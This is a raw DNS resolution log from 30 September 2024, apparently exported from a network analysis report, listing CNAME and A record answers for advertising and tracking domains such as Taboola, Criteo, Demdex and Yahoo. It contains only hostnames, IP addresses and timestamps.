                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.219470024 CEST1.1.1.1192.168.2.40x7f7eNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.219470024 CEST1.1.1.1192.168.2.40x7f7eNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220375061 CEST1.1.1.1192.168.2.40x7d21No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220375061 CEST1.1.1.1192.168.2.40x7d21No error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220386982 CEST1.1.1.1192.168.2.40xb973No error (0)tsdtocl.com151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220386982 CEST1.1.1.1192.168.2.40xb973No error (0)tsdtocl.com151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220386982 CEST1.1.1.1192.168.2.40xb973No error (0)tsdtocl.com151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220386982 CEST1.1.1.1192.168.2.40xb973No error (0)tsdtocl.com151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220653057 CEST1.1.1.1192.168.2.40x45d3No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.220817089 CEST1.1.1.1192.168.2.40x6ccaNo error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.224682093 CEST1.1.1.1192.168.2.40x73adNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.224682093 CEST1.1.1.1192.168.2.40x73adNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.224682093 CEST1.1.1.1192.168.2.40x73adNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.224682093 CEST1.1.1.1192.168.2.40x73adNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.224682093 CEST1.1.1.1192.168.2.40x73adNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.226644993 CEST1.1.1.1192.168.2.40xaa0cNo error (0)api.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.969374895 CEST1.1.1.1192.168.2.40x432eNo error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.973326921 CEST1.1.1.1192.168.2.40x78e2No error (0)pm-widget.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.973326921 CEST1.1.1.1192.168.2.40x78e2No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.973326921 CEST1.1.1.1192.168.2.40x78e2No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.973326921 CEST1.1.1.1192.168.2.40x78e2No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:07.973326921 CEST1.1.1.1192.168.2.40x78e2No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:08.106563091 CEST1.1.1.1192.168.2.40x9177No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:08.106944084 CEST1.1.1.1192.168.2.40xa039No error (0)gum.criteo.comgum.nl3.vip.prod.criteo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:08.106944084 CEST1.1.1.1192.168.2.40xa039No error (0)gum.nl3.vip.prod.criteo.com178.250.1.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.223191023 CEST1.1.1.1192.168.2.40xdd70No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.224818945 CEST1.1.1.1192.168.2.40x7b18No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.215.98.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.13.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.252.162.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.72.22.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.17.201.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.152.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.26.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228157997 CEST1.1.1.1192.168.2.40x2065No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.68.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228247881 CEST1.1.1.1192.168.2.40x9002No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228247881 CEST1.1.1.1192.168.2.40x9002No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.228247881 CEST1.1.1.1192.168.2.40x9002No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.374762058 CEST1.1.1.1192.168.2.40xad89No error (0)aa.agkn.comActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.376748085 CEST1.1.1.1192.168.2.40x207eNo error (0)aa.agkn.comActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.376748085 CEST1.1.1.1192.168.2.40x207eNo error (0)ActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.com52.49.76.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.376748085 CEST1.1.1.1192.168.2.40x207eNo error (0)ActivationEdge-activation-212358690.eu-west-1.elb.amazonaws.com52.209.249.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.723020077 CEST1.1.1.1192.168.2.40xea4aNo error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.723020077 CEST1.1.1.1192.168.2.40xea4aNo error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.723020077 CEST1.1.1.1192.168.2.40xea4aNo error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:09.723321915 CEST1.1.1.1192.168.2.40x7fcNo error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497801065 CEST1.1.1.1192.168.2.40x1150No error (0)cms.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497801065 CEST1.1.1.1192.168.2.40x1150No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497801065 CEST1.1.1.1192.168.2.40x1150No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497801065 CEST1.1.1.1192.168.2.40x1150No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497801065 CEST1.1.1.1192.168.2.40x1150No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497812986 CEST1.1.1.1192.168.2.40xe4No error (0)cms.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497812986 CEST1.1.1.1192.168.2.40xe4No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.497812986 CEST1.1.1.1192.168.2.40xe4No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.520942926 CEST1.1.1.1192.168.2.40xabfeNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.522015095 CEST1.1.1.1192.168.2.40x10efNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.671936989 CEST1.1.1.1192.168.2.40x742cNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.671936989 CEST1.1.1.1192.168.2.40x742cNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.671936989 CEST1.1.1.1192.168.2.40x742cNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.671936989 CEST1.1.1.1192.168.2.40x742cNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.671936989 CEST1.1.1.1192.168.2.40x742cNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.673614025 CEST1.1.1.1192.168.2.40xecadNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:10.674035072 CEST1.1.1.1192.168.2.40xceb6No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.202.39.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.248.147.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.182.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.26.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com3.254.33.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.16.68.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.17.201.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.044671059 CEST1.1.1.1192.168.2.40x204aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.217.153.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.046827078 CEST1.1.1.1192.168.2.40x44acNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.046827078 CEST1.1.1.1192.168.2.40x44acNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.046827078 CEST1.1.1.1192.168.2.40x44acNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.085781097 CEST1.1.1.1192.168.2.40x228eNo error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.085781097 CEST1.1.1.1192.168.2.40x228eNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.085781097 CEST1.1.1.1192.168.2.40x228eNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.085781097 CEST1.1.1.1192.168.2.40x228eNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.085781097 CEST1.1.1.1192.168.2.40x228eNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:11.086345911 CEST1.1.1.1192.168.2.40x18d8No error (0)pips.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.147959948 CEST1.1.1.1192.168.2.40x6247No error (0)cds.taboola.comus-cds.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.147959948 CEST1.1.1.1192.168.2.40x6247No error (0)us-cds.taboola.com141.226.224.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.149075031 CEST1.1.1.1192.168.2.40xedb3No error (0)cds.taboola.comus-cds.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.207232952 CEST1.1.1.1192.168.2.40x6b3fNo error (0)i.clean.gg34.95.69.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.436672926 CEST1.1.1.1192.168.2.40xf2ddNo error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.436672926 CEST1.1.1.1192.168.2.40xf2ddNo error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.436672926 CEST1.1.1.1192.168.2.40xf2ddNo error (0)edge-prebid-cdn.g03.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.437175989 CEST1.1.1.1192.168.2.40xae81No error (0)pbs.yahoo.comedge-prebid-cdn.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446042061 CEST1.1.1.1192.168.2.40xeef0No error (0)idx.liadm.comidx.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.liadm.comidx.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com3.221.152.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com44.193.142.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com52.7.94.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com3.233.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com54.158.208.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.446146011 CEST1.1.1.1192.168.2.40xcd49No error (0)idx.cph.liveintent.com34.198.49.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.843626022 CEST1.1.1.1192.168.2.40x11d0No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.843626022 CEST1.1.1.1192.168.2.40x11d0No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)c2shb-oao.ssp.yahoo.comglobal-dtp-oao.ybp.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)global-dtp-oao.ybp.yahoo.comdtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.212.106.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud52.215.101.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.154.40.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud54.171.151.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud99.81.68.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.844404936 CEST1.1.1.1192.168.2.40xc90No error (0)dtp-gateway-prod-global.dsp-plus-backend.aws.oath.cloud3.251.108.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.861366987 CEST1.1.1.1192.168.2.40x483fNo error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.861886024 CEST1.1.1.1192.168.2.40xd6d8No error (0)fastlane.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.876725912 CEST1.1.1.1192.168.2.40xd3c4No error (0)display.bidder.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.876725912 CEST1.1.1.1192.168.2.40xd3c4No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.876725912 CEST1.1.1.1192.168.2.40xd3c4No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.876725912 CEST1.1.1.1192.168.2.40xd3c4No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.876725912 CEST1.1.1.1192.168.2.40xd3c4No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883328915 CEST1.1.1.1192.168.2.40xad6eNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:12.883342981 CEST1.1.1.1192.168.2.40x4f4aNo error (0)images.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
